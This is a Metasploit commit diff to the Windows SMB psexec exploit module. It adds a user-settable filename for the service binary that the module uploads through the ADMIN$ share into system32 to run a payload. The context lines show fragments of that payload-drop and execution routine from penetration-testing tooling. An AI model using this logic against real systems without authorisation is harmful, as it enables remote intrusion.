Land rapid7#1804, user-settable filename for psexec

egypt · egypt · commit 4f6d80c813da · 2013-05-31T13:34:52.000-05:00
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
@@ -82,7 +82,8 @@ def initialize(info = {})
 		register_advanced_options(
 			[
 				OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
-				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
+				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
+				OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil])
 			], self.class)
 	end
 
@@ -124,6 +125,8 @@ def exploit
 			report_auth_info(report_hash)
 		end
 
+		filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+
 		if datastore['MOF_UPLOAD_METHOD']
 			# payload as exe
 			print_status("Trying wbemexec...")
@@ -133,7 +136,6 @@ def exploit
 				return
 			end
 			simple.connect("ADMIN$")
-			filename = rand_text_alpha(8) + ".exe"
 			exe = generate_payload_exe
 			fd = smb_open("\\system32\\#{filename}", 'rwct')
 			fd << exe
@@ -152,7 +154,6 @@ def exploit
 			# Disconnect from the ADMIN$
 			simple.disconnect("ADMIN$")
 		else
-			filename = rand_text_alpha(8) + ".exe"
 			servicename = rand_text_alpha(8)
 
 			# Upload the shellcode to a file
